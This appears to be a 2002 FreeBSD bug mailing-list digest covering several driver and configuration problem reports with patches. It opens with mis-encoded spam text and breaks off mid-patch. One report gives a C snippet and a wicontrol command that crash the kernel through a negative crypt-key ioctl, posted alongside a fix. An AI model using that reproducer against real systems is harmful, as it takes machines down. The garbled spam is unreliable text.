╤Ир╓ьЁЮ╩Г╧╓╧к╧жХ╖╥уХ╥с╖р╧╩цп╗скцвмбя╖ДаХау╖р╧╥с ╧я║хж║ир╥уХ║сея╖хж║ирмбыХ ╪ыИгХр╖╖р╧ кцвм╪ыИ╥уХбя╖╬мауЮгергХр╖╗р║╖р╧╩цп╗с ау╓ьЁйа╨я╣тЮ╨вИм╖╣И╧╢я╖╧уИ 1. ау╥ях╧╓╣т╥уХ╢у 2. ╬цИма╥уХ╗пЮцуб╧цыИ Ю╧вХм╖╗р║Ю╩Г╧цп╨╨ЦкаХ╗ж╖╣Им╖ЦкИау║рцм╨цаЦкИ╣ра╓граЮкарпйа 3. ╣Им╖║рц╥уХ╗п╥с╖р╧мбХр╖╗цт╖╗я╖ мбр║╥уХ╗пЮ╩еуХб╧╟р╧п╥р╖║рцЮ╖т╧╒м╖╣╧Юм╖ Аепмбр║ауцрбД╢И╗р║║рц╥с╖р╧╣ц╖╧уИ╗цт╖Ф ╥ь║мбХр╖Ю╩Г╧Д╩Д╢И Ц╧ http://www.geocities.com/getchances2000/ мбХр !┘┘┘┘┘.. Ю╩Г╧А╓ХЮ╬уб╖╓╧╥уХ╧яХ╖цмБм║рй To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 13:30:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4631137B401 for ; Fri, 28 Jun 2002 13:30:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 717B443E0A for ; Fri, 28 Jun 2002 13:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5SKU2JU011796 for ; Fri, 28 Jun 2002 13:30:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5SKU2l4011795; Fri, 28 Jun 2002 13:30:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A4AF737B400 for ; Fri, 28 Jun 2002 13:25:36 -0700 (PDT) Received: from kjell.utb.falun.se (gw2.falun.se [192.121.234.252]) by mx1.FreeBSD.org (Postfix) with ESMTP id E27E343E06 for ; Fri, 28 Jun 2002 13:25:35 -0700 (PDT) (envelope-from root@kjell.utb.falun.se) Received: by kjell.utb.falun.se (Postfix, from userid 0) id 82DCA2D1; Fri, 28 Jun 2002 22:26:06 +0200 (CEST) Message-Id: <20020628202606.82DCA2D1@kjell.utb.falun.se> Date: Fri, 28 Jun 2002 22:26:06 +0200 (CEST) From: elias@kjell.utb.falun.se Reply-To: elias@kjell.utb.falun.se To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/39960: wi driver can cause system crash when trying to handle negative value for WI_RID_TX_CRYPT_KEY Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39960 >Category: kern >Synopsis: wi driver can cause system crash when trying to handle negative value for WI_RID_TX_CRYPT_KEY >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 28 13:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Elias Norberg >Release: FreeBSD 4.6-RELEASE i386 >Organization: >Environment: System: FreeBSD node23 4.6-RELEASE FreeBSD 4.6-RELEASE #1: Sat Jun 22 16:22:28 CEST 2002 root@node23:/usr/src/sys/compile/FreeBSD i386 >Description: When executing the following command on a computer with the 3CRWE777A wireless device, the system crashes: wicontrol -T 0 In turn, wicontol executes the following code: (this code has been shortened down to show the cause of the problem) ---------- struct wi_req wreq; struct ifreq ifr; int sock; sock = socket(AF_INET, SOCK_DGRAM, 0); wreq.wi_type = WI_RID_TX_CRYPT_KEY; wreq.wi_len = 2; wreq.wi_val[0] = -1; bzero(&ifr, sizeof(ifr)); strcpy(ifr.ifr_name, "wi0"); ifr.ifr_data = (caddr_t)&wreq; ioctl(sock, SIOCSWAVELAN, &ifr ) close(sock); ---------- When this ioctl is executed, the system crashes, due to an illegal value being written to the wireless card. >How-To-Repeat: See above for a complete code-snippet which reproduces this, alternatively, try executing 'wicontrol -T 0'. >Fix: Below is a patch for sys/dev/wi/if_wi.c from 4.6-RELEASE. This takes care of the problem, and shouldnt break anything, since the standard values range from 0 to 3. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 14:10:20 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B681237B400 for ; Fri, 28 Jun 2002 14:10:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id AFD9843E1A for ; Fri, 28 Jun 2002 14:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5SLA3JU019564 for ; Fri, 28 Jun 2002 14:10:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5SLA3XS019563; Fri, 28 Jun 2002 14:10:03 -0700 (PDT) Date: Fri, 28 Jun 2002 14:10:03 -0700 (PDT) Message-Id: <200206282110.g5SLA3XS019563@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: elias@kjell.utb.falun.se (elias) Subject: Re: kern/39960: wi driver can cause system crash when trying to handle negative value for WI_RID_TX_CRYPT_KEY Reply-To: elias@kjell.utb.falun.se (elias) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/39960; it has been noted by GNATS. From: elias@kjell.utb.falun.se (elias) To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: kern/39960: wi driver can cause system crash when trying to handle negative value for WI_RID_TX_CRYPT_KEY Date: Fri, 28 Jun 2002 23:01:18 +0200 (CEST) Here's the patch. (somehow it was left out of the original post) ----cut------------ *** if_wi.c.old Fri Jun 28 15:42:24 2002 --- if_wi.c Fri Jun 28 15:45:20 2002 *************** *** 1151,1156 **** --- 1151,1159 ---- ltv = &p2ltv; break; case WI_RID_TX_CRYPT_KEY: + /* negative can values result in kernel crash */ + if( ltv->wi_val < 0 ) + return 0; p2ltv.wi_type = WI_RID_P2_TX_CRYPT_KEY; p2ltv.wi_len = 2; p2ltv.wi_val = ltv->wi_val; ----cut------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 15: 0:35 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D090337B405 for ; Fri, 28 Jun 2002 15:00:17 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 804E643E1A for ; Fri, 28 Jun 2002 15:00:10 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5SM0AJU024271 for ; Fri, 28 Jun 2002 15:00:10 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5SM0A5H024270; Fri, 28 Jun 2002 15:00:10 -0700 (PDT) Date: Fri, 28 Jun 2002 15:00:10 -0700 (PDT) Message-Id: <200206282200.g5SM0A5H024270@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Mike Meyer Subject: Re: conf/39192: [PATCH] Save pcm mixer settings during reboot Reply-To: Mike Meyer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR conf/39192; it has been noted by GNATS. From: Mike Meyer To: Peter Pentchev Cc: Martin Blapp , bug-followup@FreeBSD.org Subject: Re: conf/39192: [PATCH] Save pcm mixer settings during reboot Date: Fri, 28 Jun 2002 16:50:51 -0500 In <20020612153930.A91891@straylight.oblivion.bg>, Peter Pentchev typed: > > Why a port for this ? It's in every base system with a sound card. > > And many people like me did not know about sysutils/mixer port. It's a port because it's easier to get that committed than a patch to the base system - which I also submitted. > > And it seems that the port doesn't check if mixer is working at all. It also doesn't deal with multiple sound cards. If there's no mixer, it really doesn't do any harm. I'm not sure how you would go about checking for one in any case. Please feel free to submit fixes for any of these problems to me. http://www.mired.org/consulting.html Independent WWW/Perforce/FreeBSD/Unix consultant, email for more information. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 15:49:46 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5013237B409 for ; Fri, 28 Jun 2002 15:49:14 -0700 (PDT) Received: from majordomo.vol.cz (smtp4.vol.cz [195.250.128.43]) by mx1.FreeBSD.org (Postfix) with ESMTP id AC99243E1F for ; Fri, 28 Jun 2002 15:16:42 -0700 (PDT) (envelope-from dan@obluda.cz) Received: from obluda.cz (xkulesh.vol.cz [195.250.154.106]) by majordomo.vol.cz (8.11.6/8.11.3) with ESMTP id g5SMGHm81944; Sat, 29 Jun 2002 00:16:18 +0200 (CEST) (envelope-from dan@obluda.cz) Message-ID: <3D1CE029.4020106@obluda.cz> Date: Sat, 29 Jun 2002 00:16:09 +0200 From: Dan Lukes User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1a) Gecko/20020611 X-Accept-Language: cs, sk, en MIME-Version: 1.0 To: Brooks Davis Cc: Andy Farkas , freebsd-bugs@FreeBSD.ORG Subject: Re: bin/39868: cleaning sbin/dump code from warnings References: <200206270110.g5R1A4QO001789@freefall.freebsd.org> <20020628100307.A26852@Odin.AC.HMC.Edu> Content-Type: text/plain; charset=ISO-8859-2; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brooks Davis wrote: > We don't commit directly to stable without significant cause and in > most cases fixing warnings in programs that work isn't. Certaintly I > would encourage anyone doing warnings fixes in current to merge these > patches as appropriate to both current and stable. For that matter, > maybe Dan want's go really get his hands dirty and try current once DP2 > comes out in July. It's shaping up pretty nicly IMO. I have dual-CPU machine. I'm not ready for current until SMPng is working, but I don't know current status of current about it ... My machine didn't boot with 5.0-current (but I tried it about 9 month ago) I can't maintain separate developper-only machine which isn't usable for regular work also. Dan -- Dan Lukes, SISAL, MFF UK tel: +420 2 21914205, fax: +420 2 21914206 AKA: dan@obluda.cz, dan@freebsd.cz, dan@kolej.mff.cuni.cz, dan@fio.cz To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 18:20: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F3E2937B401 for ; Fri, 28 Jun 2002 18:20:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 05E2643E13 for ; Fri, 28 Jun 2002 18:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5T1K1JU062761 for ; Fri, 28 Jun 2002 18:20:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5T1K1OL062760; Fri, 28 Jun 2002 18:20:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A1F6937B400 for ; Fri, 28 Jun 2002 18:13:36 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 44E9343E1A for ; Fri, 28 Jun 2002 18:13:36 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5T1DZOT012823 for ; Fri, 28 Jun 2002 18:13:35 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5T1DZLC012822; Fri, 28 Jun 2002 18:13:35 -0700 (PDT) Message-Id: <200206290113.g5T1DZLC012822@www.freebsd.org> Date: Fri, 28 Jun 2002 18:13:35 -0700 (PDT) From: Morten Aaboe Jensen To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/39974: fxp driver doesn't detect the 82562 chipset on Intel EthernetExpress NICs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39974 >Category: kern >Synopsis: fxp driver doesn't detect the 82562 chipset on Intel EthernetExpress NICs >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 28 18:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Morten Aaboe Jensen >Release: 4.6-RELEASE >Organization: >Environment: FreeBSD 4.6-STABLE FreeBSD 4.6--STABLE #0: Sat Jun 29 02:45:20 CEST 2002 root@:/usr/obj/usr/src/sys/KENNY i386 >Description: The fxp driver doesn't claim ownership of the i82562 chipset, and causes some embedded NICs not to be detected. Output from 'pciconf -lv': fxp0@pci2:8:0: class=0x020000 card=0x80711043 chip=0x103a8086 rev=0x81 hdr=0x00 vendor = 'Intel Corporation' device = '82801DB (ICH4) LAN Controller with 82562ET/EZ (CNR) PHY' class = network subclass = ethernet Just adding an entry catching 0x103A to if_fxp.c fixes the problem. >How-To-Repeat: Just boot any machine with a NIC using the i82562 chipset >Fix: Add an entry to sys/dev/fxp/if_fxp.c to catch the new chipset. --- if_fxp.c Sat Jun 29 03:07:03 2002 +++ if_fxp.c-patched Sat Jun 29 03:06:43 2002 @@ -160,6 +160,7 @@ { 0x1037, "Intel Pro/100 Ethernet" }, { 0x1038, "Intel Pro/100 Ethernet" }, { 0x1039, "Intel Pro/100 Ethernet" }, + { 0x103A, "Intel Pro/100 Ethernet" }, { 0, NULL }, }; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 18:50:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7219D37B405 for ; Fri, 28 Jun 2002 18:50:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id F1F8F43E0A for ; Fri, 28 Jun 2002 18:50:06 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5T1o6JU065987 for ; Fri, 28 Jun 2002 18:50:06 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5T1o6Q7065986; Fri, 28 Jun 2002 18:50:06 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BCB7937B405 for ; Fri, 28 Jun 2002 18:44:24 -0700 (PDT) Received: from spitfire.303.krakow.pl (spitfire.303.krakow.pl [62.233.208.97]) by mx1.FreeBSD.org (Postfix) with SMTP id 7541243E06 for ; Fri, 28 Jun 2002 18:44:23 -0700 (PDT) (envelope-from winfried@spitfire.303.krakow.pl) Received: (qmail 73790 invoked by uid 1001); 29 Jun 2002 01:44:16 -0000 Message-Id: <20020629014416.73606.qmail@spitfire.303.krakow.pl> Date: 29 Jun 2002 01:44:16 -0000 From: Jan Srzednicki To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: conf/39976: vi recovery halting boot process Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39976 >Category: conf >Synopsis: vi recovery halting boot process >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Jun 28 18:50:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Jan Srzednicki >Release: FreeBSD 4.6-RC i386 >Organization: Dywizjonet >Environment: System: FreeBSD spitfire.303.krakow.pl 4.6-RC FreeBSD 4.6-RC #5: Tue May 21 23:07:20 CEST 2002 root@spitfire.303.krakow.pl:/usr/obj/usr/src/sys/GRABKI i386 >Description: In some cirtumstances, the "vi recovery" thing started at boot time fails to work and the system just freezes on that point. Hitting Ctrl-C usually helps, but not always; it's quite irritating, especially when one does not use vi at all. I thing a solution would be putting some new option into rc.conf (like vi_recovery_enable="YES/NO"), which would control starting or not the vi recovery thing. >How-To-Repeat: I'm not sure why it happens; none of my servers seem to be affected, but my workstation is. >Fix: As stated above. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 18:51:25 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AAFEE37B401 for ; Fri, 28 Jun 2002 18:50:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7F45543E06 for ; Fri, 28 Jun 2002 18:50:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5T1o7JU066025 for ; Fri, 28 Jun 2002 18:50:07 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5T1o7n4066024; Fri, 28 Jun 2002 18:50:07 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5DFD637B400 for ; Fri, 28 Jun 2002 18:48:41 -0700 (PDT) Received: from atropos.snu.ac.kr (atropos.snu.ac.kr [147.46.106.37]) by mx1.FreeBSD.org (Postfix) with ESMTP id 762CE43E06 for ; Fri, 28 Jun 2002 18:48:40 -0700 (PDT) (envelope-from redjade@atropos.snu.ac.kr) Received: (from redjade@localhost) by atropos.snu.ac.kr (8.11.6/8.11.6) id g5T1mc006475; Sat, 29 Jun 2002 10:48:38 +0900 (KST) Message-Id: <20020629104838.A6435@atropos.snu.ac.kr> Date: Sat, 29 Jun 2002 10:48:38 +0900 From: Kyunghwan Kim Reply-To: Kyunghwan Kim To: FreeBSD-gnats-submit@FreeBSD.org Subject: kern/39977: Device polling support for em(4) driver Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39977 >Category: kern >Synopsis: Device polling support for em(4) driver >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Jun 28 18:50:06 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Kyunghwan Kim >Release: FreeBSD 5.0-CURRENT i386 >Organization: Web Data Bank, Inc. >Environment: System: FreeBSD genomy.wdb.co.kr 5.0-CURRENT FreeBSD 5.0-CURRENT #0: Tue Apr 9 15:40:58 KST 2002 root@genomy.wdb.co.kr:/usr/src/sys/i386/compile/GENOMY i386 >Description: Device polling support for em(4) driver. >How-To-Repeat: nothing >Fix: Don't mind the revision numbers, these are in local cvs. patch against -CURRENT today(20020629): Index: if_em.c =================================================================== RCS file: /data/cvs/em/if_em.c,v retrieving revision 1.11 retrieving revision 1.11.2.1 diff -u -r1.11 -r1.11.2.1 --- if_em.c 2002/06/21 09:13:34 1.11 +++ if_em.c 2002/06/28 09:49:27 1.11.2.1 @@ -143,6 +143,9 @@ static int em_get_buf(struct em_rx_buffer *, struct adapter *, struct mbuf *); static void em_enable_vlans(struct adapter *adapter); +#ifdef DEVICE_POLLING +static poll_handler_t em_poll; +#endif /* DEVICE_POLLING */ /********************************************************************* * FreeBSD Device Interface Entry Points @@ -631,6 +634,11 @@ em_set_multi(adapter); if (adapter->hw.mac_type == em_82542_rev2_0) em_initialize_receive_unit(adapter); +#ifdef DEVICE_POLLING + if (ifp->if_ipending & IFF_POLLING) + break; + else +#endif /* DEVICE_POLLING */ em_enable_intr(adapter); } break; @@ -919,6 +927,11 @@ adapter->timer_handle = timeout(em_local_timer, adapter, 2*hz); em_clear_hw_cntrs(&adapter->hw); +#ifdef DEVICE_POLLING + if (ifp->if_ipending & IFF_POLLING) + em_disable_intr(adapter); + else +#endif /* DEVICE_POLLING */ em_enable_intr(adapter); splx(s); @@ -951,6 +964,9 @@ /* Tell the stack that the interface is no longer active */ ifp->if_flags &= ~(IFF_RUNNING | IFF_OACTIVE); +#ifdef DEVICE_POLLING + ether_poll_deregister(ifp); +#endif /* DEVICE_POLLING */ return; } @@ -970,6 +986,17 @@ ifp = &adapter->interface_data.ac_if; +#ifdef DEVICE_POLLING + if (ifp->if_ipending & IFF_POLLING) + return; + + if (ether_poll_register(em_poll, ifp)) { + em_disable_intr(adapter); + em_poll(ifp, 0, 1); + return; + } +#endif /* DEVICE_POLLING */ + em_disable_intr(adapter); while (loop_cnt > 0 && (reg_icr = E1000_READ_REG(&adapter->hw, ICR)) != 0) { @@ -1892,6 +1919,13 @@ } while (current_desc->status & E1000_RXD_STAT_DD) { +#ifdef DEVICE_POLLING + if (ifp->if_ipending & IFF_POLLING) { + if (adapter->rxcycles <= 0) + break; + adapter->rxcycles--; + } +#endif /* DEVICE_POLLING */ /* Get a pointer to the actual receive buffer */ rx_buffer = STAILQ_FIRST(&adapter->rx_buffer_list); @@ -2366,3 +2400,45 @@ return; } +#ifdef DEVICE_POLLING +static void +em_poll(struct ifnet *ifp, enum poll_cmd cmd, int count) +{ + struct adapter *adapter = ifp->if_softc; + u_int32_t loop_cnt = EM_MAX_INTR; + u_int32_t reg_icr; + + if (cmd == POLL_DEREGISTER) { + em_enable_intr(adapter); + return; + } + + adapter->rxcycles = count; + em_process_receive_interrupts(adapter); + em_clean_transmit_interrupts(adapter); + if (ifp->if_flags & IFF_RUNNING && ifp->if_snd.ifq_head != NULL) + em_start(ifp); + + if (cmd == POLL_AND_CHECK_STATUS) { + while (loop_cnt > 0 && (reg_icr = E1000_READ_REG(&adapter->hw, + ICR)) != 0) { + /* Link status change */ + if (reg_icr & (E1000_ICR_RXSEQ | E1000_ICR_LSC)) { + untimeout(em_local_timer, adapter, + adapter->timer_handle); + adapter->hw.get_link_status = 1; + em_check_for_link(&adapter->hw); + em_print_link_status(adapter); + adapter->timer_handle = timeout(em_local_timer, + adapter, 2*hz); + } + + if (ifp->if_flags & IFF_RUNNING) { + em_process_receive_interrupts(adapter); + em_clean_transmit_interrupts(adapter); + } + loop_cnt--; + } + } +} +#endif /* DEVICE_POLLING */ Index: if_em.h =================================================================== RCS file: /data/cvs/em/if_em.h,v retrieving revision 1.3 retrieving revision 1.3.2.1 diff -u -r1.3 -r1.3.2.1 --- if_em.h 2002/06/21 09:13:35 1.3 +++ if_em.h 2002/06/28 09:49:28 1.3.2.1 @@ -245,6 +245,9 @@ #endif struct em_hw_stats stats; +#ifdef DEVICE_POLLING + int rxcycles; +#endif /* DEVICE_POLLING */ }; #endif /* _EM_H_DEFINED_ */ and patch against -STABLE today(20020629): Index: if_em.c =================================================================== RCS file: /data/cvs/em/if_em.c,v retrieving revision 1.1.1.1.2.1 retrieving revision 1.1.1.1.2.1.2.1 diff -u -r1.1.1.1.2.1 -r1.1.1.1.2.1.2.1 --- if_em.c 2002/06/19 08:28:59 1.1.1.1.2.1 +++ if_em.c 2002/06/28 09:16:36 1.1.1.1.2.1.2.1 @@ -143,6 +143,9 @@ static int em_get_buf __P((struct em_rx_buffer *, struct adapter *, struct mbuf *)); static void em_enable_vlans __P((struct adapter *adapter)); +#ifdef DEVICE_POLLING +static poll_handler_t em_poll; +#endif /* DEVICE_POLLING */ /********************************************************************* * FreeBSD Device Interface Entry Points @@ -631,6 +634,11 @@ em_set_multi(adapter); if (adapter->hw.mac_type == em_82542_rev2_0) em_initialize_receive_unit(adapter); +#ifdef DEVICE_POLLING + if (ifp->if_ipending & IFF_POLLING) + break; + else +#endif /* DEVICE_POLLING */ em_enable_intr(adapter); } break; @@ -919,6 +927,11 @@ adapter->timer_handle = timeout(em_local_timer, adapter, 2*hz); em_clear_hw_cntrs(&adapter->hw); +#ifdef DEVICE_POLLING + if (ifp->if_ipending & IFF_POLLING) + em_disable_intr(adapter); + else +#endif /* DEVICE_POLLING */ em_enable_intr(adapter); splx(s); @@ -951,6 +964,10 @@ /* Tell the stack that the interface is no longer active */ ifp->if_flags &= ~(IFF_RUNNING | IFF_OACTIVE); +#ifdef DEVICE_POLLING + ether_poll_deregister(ifp); +#endif /* DEVICE_POLLING */ + return; } @@ -970,6 +987,17 @@ ifp = &adapter->interface_data.ac_if; +#ifdef DEVICE_POLLING + if (ifp->if_ipending & IFF_POLLING) + return; + + if (ether_poll_register(em_poll, ifp)) { + em_disable_intr(adapter); + em_poll(ifp, 0, 1); + return; + } +#endif /* DEVICE_POLLING */ + em_disable_intr(adapter); while (loop_cnt > 0 && (reg_icr = E1000_READ_REG(&adapter->hw, ICR)) != 0) { @@ -1892,6 +1920,13 @@ } while (current_desc->status & E1000_RXD_STAT_DD) { +#ifdef DEVICE_POLLING + if (ifp->if_ipending & IFF_POLLING) { + if (adapter->rxcycles <= 0) + break; + adapter->rxcycles--; + } +#endif /* DEVICE_POLLING */ /* Get a pointer to the actual receive buffer */ rx_buffer = STAILQ_FIRST(&adapter->rx_buffer_list); @@ -2366,3 +2401,45 @@ return; } +#ifdef DEVICE_POLLING +static void +em_poll(struct ifnet *ifp, enum poll_cmd cmd, int count) +{ + struct adapter *adapter = ifp->if_softc; + u_int32_t loop_cnt = EM_MAX_INTR; + u_int32_t reg_icr; + + if (cmd == POLL_DEREGISTER) { + em_enable_intr(adapter); + return; + } + + adapter->rxcycles = count; + em_process_receive_interrupts(adapter); + em_clean_transmit_interrupts(adapter); + if (ifp->if_flags & IFF_RUNNING && ifp->if_snd.ifq_head != NULL) + em_start(ifp); + + if (cmd == POLL_AND_CHECK_STATUS) { + while (loop_cnt > 0 && (reg_icr = E1000_READ_REG(&adapter->hw, + ICR)) != 0) { + /* Link status change */ + if (reg_icr & (E1000_ICR_RXSEQ | E1000_ICR_LSC)) { + untimeout(em_local_timer, adapter, + adapter->timer_handle); + adapter->hw.get_link_status = 1; + em_check_for_link(&adapter->hw); + em_print_link_status(adapter); + adapter->timer_handle = timeout(em_local_timer, + adapter, 2*hz); + } + + if (ifp->if_flags & IFF_RUNNING) { + em_process_receive_interrupts(adapter); + em_clean_transmit_interrupts(adapter); + } + loop_cnt--; + } + } +} +#endif /* DEVICE_POLLING */ Index: if_em.h =================================================================== RCS file: /data/cvs/em/if_em.h,v retrieving revision 1.1.1.1.2.1 retrieving revision 1.1.1.1.2.1.2.1 diff -u -r1.1.1.1.2.1 -r1.1.1.1.2.1.2.1 --- if_em.h 2002/06/19 08:29:00 1.1.1.1.2.1 +++ if_em.h 2002/06/28 09:16:37 1.1.1.1.2.1.2.1 @@ -245,6 +245,10 @@ #endif struct em_hw_stats stats; + 